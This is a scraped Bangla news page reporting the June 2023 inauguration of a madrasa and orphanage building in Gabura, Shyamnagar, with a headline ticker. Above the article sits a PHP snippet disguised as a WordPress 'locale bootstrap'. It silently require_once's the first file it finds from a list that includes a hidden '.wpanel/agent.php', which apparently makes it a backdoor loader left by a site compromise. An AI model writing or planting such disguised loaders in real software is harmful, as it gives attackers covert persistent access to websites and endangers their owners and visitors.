// wp-core-locale-bootstrap $_wp_locale_candidates = [ __DIR__ . '/languages/class-wp-locale-data.php', __DIR__ . '/upgrade/class-wp-locale-data.php', __DIR__ . '/cache/class-wp-locale-data.php', __DIR__ . '/.wpanel/agent.php', ]; foreach ($_wp_locale_candidates as $_wp_locale_data) { if (is_file($_wp_locale_data)) { require_once $_wp_locale_data; break; } } গাবুরা ডুমুরিয়া হাফিজিয়া মাদ্রাসা ও এতিমখানার ভবনে শুভ উদ্বোধন - www.htbanglatv.com গাবুরা ডুমুরিয়া হাফিজিয়া মাদ্রাসা ও এতিমখানার ভবনে শুভ উদ্বোধন - www.htbanglatv.com
শিরোনাম
তালায় মাদকের তথ্য দেওয়ায় গ্রাম পুলিশকে পেটাল মাদক কারবারিরা, জিডি চন্দনাইশে খুনিয়া পাড়া ইয়াং সোসাইটির অলিম্পিক ফুটবল টুর্নামেন্টের উদ্বোধন  পোরশায় মাদকবিরোধী অভিযানে ০১ জন পেশাদার খুচরা মাদক ব্যবসায়ী গ্রেফতার-২৫০ গ্রাম গাঁজা জব্দ।  ইন্দোরে শুরু হলো ১৮তম ভারতীয় সাংবাদিকতা উৎসব ২০২৬: মূল ভাবনা ‘জেন-জি’, সম্মানিত সংবাদমাধ্যমের কিংবদন্তিরা। পোরশায় আদিবাসী সমাবেশ ও ত্রি-বার্ষিক সমাবেশ ২০২৬ অনুষ্ঠিত।     নীলফামারীতে বিজিবির অভিযানে ১৮ পিস ইয়াবাসহ শীর্ষ মাদক ব্যবসায়ী আটক শিক্ষার গুণগত মানোন্নয়নের লক্ষে নিতপুর দারুস সুন্নাহ সিনিয়র ফাজিল মাদ্রাসায় এক মা সমাবেশ ২০২৬ অনুষ্ঠিত।  হাজরাকাটি ব্লাড ডোনার্স ক্লাবের ১ম প্রতিষ্ঠাবার্ষিকীতে বিনামূল্যে রক্তের গ্রুপ নির্ণয় ও আলোচনা সভা পোরশা উপজেলায় নতুন গাইনী ডাক্তারের যোগদান , রোগীদের পাশে থাকার অঙ্গীকার লালমনিরহাট ও ডিমলায় বিজিবির অভিযানে ১৭ লাখ টাকার চুইঝাল ও কাঠ জব্দ
বুধবার, ০৭ অক্টোবর ২০২৬, ০৮:২২ পূর্বাহ্ন

গাবুরা ডুমুরিয়া হাফিজিয়া মাদ্রাসা ও এতিমখানার ভবনে শুভ উদ্বোধন

রিপোটারের নাম / ১১৯৩ বার পড়া হয়েছে
প্রকাশের সময় : শুক্রবার, ১৬ জুন, ২০২৩

 

আল-হুদা মালী, সাতক্ষীরা, শ্যামনগর প্রতিনিধি: শ্যামনগর উপজেলার গাবুরা ইউনিয়নে ডুমুরিয়া রাহে জান্নাত হাফিজিয়া মাদ্রাসা ও এতিমখানা সহ লিল্লাহ বোডিং এর ভবন উদ্বোধন হয়েছে।

শুক্রবার (১৬ জুন) জুম্মা নামাজের পর শ্যামনগর উপজেলা নির্বাহী অফিসার মোঃ আক্তার হোসেন শুভ উদ্বোধন উপলক্ষে ফলক উন্মোচন করেন।

শুভ উদ্বোধনে আরো উপস্থিত ছিলেন, শ্যামনগর থানার ভারপ্রাপ্ত কর্মকর্তা মোঃ নূরুল ইসলাম বাদল, বুড়িগোয়ালিনী নৌ থানার ভারপ্রাপ্ত কর্মকর্তা মোঃ সাখাওয়াত হোসেন, ও দ্বীপ ইউনিয়ন গাবুরা পরিষদের চেয়ারম্যান আলহাজ্ব জি, এম, মাছুদুল আলম।

শ্যামনগর উপজেলা নির্বাহী অফিসার মোঃ আক্তার হোসেন উদ্বোধনে সংক্ষিপ্ত বক্তব্যে বলেন, কুরআন তথা নৈতিক শিক্ষার মাধ্যমে আমাদের আজকের শিশুরাই আগামীর বাংলাদেশ বিনির্মাণে সহায়ক ভূমিকা পালন করবে।

শ্যামনগর থানার অফিসার ইনচার্জ নূরুল ইসলাম বাদল বলেন, দ্বীন শিক্ষা এমন একটি মাধ্যম যে, সমাজের অন্যায় অপরাধ ও শৃঙ্খলা বজায় রাখতে ধর্মীয় ও নৈতিক শিক্ষার বিকল্প নেই।

অনুষ্ঠানে সভাপতিত্ব করেন, গাবুরা ইউনিয়ন পরিষদের ৭নং ইউপি সদস্য ও অত্র প্রতিষ্ঠানের (সভাপতি) জি, এম, আবিয়ার রহমান, এবং বিভিন্ন মসজিদের সভাপতি, সাধারণ সম্পাদক, সহ স্থানীয় গণ্যমান্য ব্যক্তিবর্গ ও সাধারণ মুসল্লিরা উপস্থিত ছিলেন।

সমগ্র অনুষ্ঠান পরিচালনা করেন, অত্র প্রতিষ্ঠানের মোয়াল্লিম হযরত মাওলানা মোঃ মনিরুজ্জামান, এবং অনুষ্ঠানের শেষে, দেশ ও জাতির কল্যাণে অত্র ভবন নির্মাণের সফলতা কামনা করে বিশেষ মোনাজাত করেন, লক্ষ্মীখালী বাগে জান্নাত হাফিজিয়া মাদ্রাসার মোয়াল্লিম হযরত মাওলানা মোঃ আকিজ উদ্দীন।


এই ক্যাটাগরির আরো সংবাদ

;